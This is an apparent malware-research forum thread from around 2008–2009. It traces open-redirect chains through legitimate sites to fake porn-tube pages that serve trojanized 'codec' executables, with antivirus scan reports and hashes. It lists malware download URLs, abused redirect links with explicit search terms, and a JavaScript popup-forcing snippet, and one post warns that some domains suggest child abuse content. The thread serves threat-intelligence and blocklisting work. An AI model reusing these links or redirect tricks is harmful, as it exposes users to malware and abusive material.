Malware Domain List
Malware Related => Malicious Domains => Topic started by: ocean on December 14, 2008, 01:36:12 am
-
Searching for some samples I've found these:
www.chiensderace.com/cgi-bin/awredir/awredir.pl?url=nebeda.com/p/go.php?sid=15&parameter=google+query
www.loftv.com/include/click.php3?idemission=5496&url=HTTP://oplanete.com/s/go.php?sid=2&parameter=google+query
That redirects to:
http://alltubesbestcollection.com/teens/xmovie.php?id=1518
(contains explicit images)
That links to:
http://codecdownload.3d-softwareportal.com/exclusivemovie.0.exe
NoVirusThanks report:
a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Trojan.Win32.Agent.auqs A
IkarusT3 - Nothing found!
Kaspersky - Trojan.Win32.Agent.auqs
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!
Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)
Also a search in Google shows these results:
holoholo.org/cgi_bin/redirect.pl?url=HTTP://nebeda.com/p/go.php?sid=13&parameter=Hana+P.+clips
www.stuartmorris.id.au/cgi-bin/awredir.pl?url=nebeda.com/p/go.php?sid=15&parameter=Pantie+Ass.Com
www.gotravelinsurance.co.uk/affiliate?tduid=777&url=HTTP://nebeda.com/p/go.php?sid=15&parameter=Arap+Porn
login2.ezproxy.slv.vic.gov.au/login?url=HTTP://nebeda.com/p/go.php?sid=15&parameter=Milf+Fuck.Com
www.gloofi.com/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Teen+Ligerie
shop.d-nexus.com/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Girl+Hairy+Hot+Teen
www.fairplaygames.com/redirect.asp?URL=HTTP://nebeda.com/p/go.php?sid=15&parameter=Ass+And+Thighs+Com
shoponline.com.sg/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Friend+Fucking+Husband+Picture+Sexy+Wife
www.realgoods.com/linkshare.do?siteID=1&url=HTTP://nebeda.com/p/go.php?sid=15&parameter=Teen+Finger+In+Ass
acom.wbf.com/Acom/showHTML.asp?URL=HTTP://nebeda.com/p/go.php?sid=7&parameter=Viv+Lesbian
www.atlantaphotos.com/redirect.php?action=url&goto=www.nebeda.com/p/go.php?sid=15&parameter=Sexy+Condoleezza+Rice+Pic
www.materiel.be/logclic/click.php?id=108&url=HTTP://oplanete.com/s/go.php?sid=9&parameter=Hentai.Com
www.businesstraveller.com/liveobjects/adsystem/go.plm?id=202&url=HTTP://oplanete.com/s/go.php?sid=2&parameter=Trixie+Teen.Com
www.dmjobs.co.uk/jobboard/scripts/vbs/adredirect.asp?b=5787&u=HTTP://oplanete.com/s/go.php?sid=2&parameter=Free+Adult+Erotic+Sex+Story.Com
darwin.eeb.uconn.edu/cgi-bin/awredir.pl?url=oplanete.com/s/go.php?sid=10&parameter=Ebony.Com
www.streetperformance.com/redirect.php?compid=777&banner=REG&catid=&url=oplanete.com/s/go.php?sid=10&parameter=Kerissa+Fare+porn
darwin.eeb.uconn.edu/cgi-bin/awredir.pl?url=sexylesm.ru/go.php?sid=4%26parameter=porn+pl+streem
www.chiensderace.com/cgi-bin/awredir/awredir.pl?url=livehomesearch.com/full/intra-uterine-insemination.html
www.stuartmorris.id.au/cgi-bin/awredir.pl?url=999666999.com/tds.php/719/slave-sucking-shemales-cock
regards
ocean
-
Thanks ocean,
these will be added to the list during the next update...
-
I've got some more ;D
http://www.prodestonline.it
We have some JavaScripts that force the user to download video.exe or to install the ActiveX (it seems that those have been removed from the server).
That piece of JavaScript calls main.php:
<body onbeforeunload="window.open('main.php');" onunload="window.open('main.php');" onclose="window.open('main.php');" id="mainbody">
main.php is recognised by the antivirus as JS/Zhelatin.zb.
Decoding it with Malzilla, the antivirus finds the signature HTML/Silly.Gen.
It seems that Malzilla doesn't automatically decode the second obfuscated JS; probably the shellcode is this:
It's probably some kind of IE/ActiveX exploit; I'll look into it later and post some others.
regards ocean
-
http://free-pornnow.com/
Follow a link http://free-pornnow.com/out.php?t=1.0.24.11&url=aHR0cDovL2ZpZWxkb25saW5lLm5ldC9pbi5jZ2k/MTU=&link=today&p=100
http://fieldonline.net/in.cgi?15
http://hot-fuck-tube-site.net/get.php?id=20582&p=38
http://just-loved-tube.com/xfreeporn.php?id=20582
Following one of the links present in the page we can find some malware or get redirected to other pages:
http://download-all4free.com/FullBSCodecz.0.exe
-
http://imp-porntube.net/pornmovies.php?id=255
Following one of the links we get to a page with some obfuscated JS and a link to malware:
http://codecdownload.extracoolfiles.com/exclusivemovie.0.exe
Deobfuscating the JS we get an embedded object, movie.mpg:
document.getElementById('playMov').innerHTML = '<embed src="/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>'
regards ocean
-
exclusivemovie.0.exe:
Detections
a-squared - Trojan.Win32.Agent!IK
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Trojan.Win32.Agent.auqs A
IkarusT3 - Trojan.Win32.Agent
Kaspersky - Trojan.Win32.Agent.auqs
McAfee - Generic Downloader.x trojan
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!
FullSBZCodecz.0.exe
Detections
a-squared - Trojan-Dropper.Agent!IK
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Trojan-Downloader.Win32.Agent.aufz A
IkarusT3 - Trojan-Dropper.Agent
Kaspersky - Trojan-Downloader.Win32.Agent.aufz
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - a variant of Win32/Kryptik.CU trojan
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!
-
update :)
http://tubezzz.com/xxx/
File Info
Report generated: 17.12.2008 at 11.54.45 (GMT 1)
Filename: teens_fuck_orgy13.mpeg._xe
File size: 1520 KB
MD5 Hash: 1BE319D57F215B3A0951AD6EECD06B89
SHA1 Hash: 5A318F2E304FE23BF78C1DBAEA23402DAEA1303E
Packer detected: Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 7 on 24
Detections
a-squared - Generic.Win32.Malware!IK
Avira AntiVir - Nothing found!
Avast - Win32:Trojan-gen {Other} (0)
AVG - :\$JF\xscan.exe Potentially harmful program Fake_AntiSpyware.AQT
BitDefender - Trojan.FakeAlert.ARC
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Generic.Win32.Malware
Kaspersky - not-a-virus:FraudTool.Win32.XLGuarder.aw
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Mal/FakeAV-Q
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!
Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)
porntuber.net/watch.php?v=3595067207
porntuber.net/download.php
redirects to http://xgguy.com/download/wmv9codec.exe
which returns a 404 page.
-
http://www.moms-galls.com/
Following the links, the mpeg video links redirect to slyvip.com/v/c.php,
which at the moment returns a 404.
http://porntubenet.com/index.php
http://porntubenet.com/download.php
redirects to http://porntubenet.com/download/ActiveXVideoCodec.exe
-
update:
temporarily removed
In the chain there are pages that link back to the page that contains the malware, cialis spam pages and others.
I haven't had time to follow every link and parse the data; probably there is a lot more to find out.
Images on some of these websites are hosted on
http://awmcity.com
regards ocean.
-
Be very wary if checking some of those, as their domain names give a very big hint of C/P.
-
You mean carding/phishing?
Here's another link chain:
http://allpornsites.info/gallery1.htm
http://www.qulclipz.com/st/st.php?cat=5509&script=1&url=http%3A%2F%2Fwww.vidzcollector.com%2Fm4%2Findex.php%3Fid%3D1956%26n%3Dmainstream%26a%3Dchids82%26v%3D44888.955555556%26preview%3Dhttp%253A%252F%252Fsimg-2.qulclipz.com%252Fst%252Fthumbs%252F037%252F6563413748.jpg&p=100
http://www.vidzcollector.com/m4/index.php?id=1956&n=mainstream&a=chids82&v=44888.955555556&preview=http%3A%2F%2Fsimg-2.qulclipz.com%2Fst%2Fthumbs%2F037%2F6563413748.jpg
http://www.vidzwares.com/download.php?id=1956
The last link is the "setup.exe" fake video codec.
-
Not quite ...... CP = Child Pornography
-
Maybe it's better if I temporarily remove the links.
However, I checked a few of them from where I parsed the links and it doesn't seem so.
regards
ocean
-
Other fake porntubes :)
masevi.net/main.html
xmoviedownloads.com/tube.htm
badwetgirls.com/blah_video.html
thesexybaby.com/bored_video.html
http://signanda.net/download/7953764e4d413d3dfcf24f1a20090516/flash_player_v11.exe
http://anubis.iseclab.org/?action=result&task_id=117a3fd6756b193d4bd9ec5167c8b4e1c
http://www.virustotal.com/en/analisis/d3c4a084fed90e6942c2da016ca0a17807fd748a8bcba19b31179e458dba1ff4-1243479143
Result: 3/40 (7.50%)
Sunbelt 3.2.1858.2 2009.05.28 Trojan.NSIS.DnsChanger (v)
regards ocean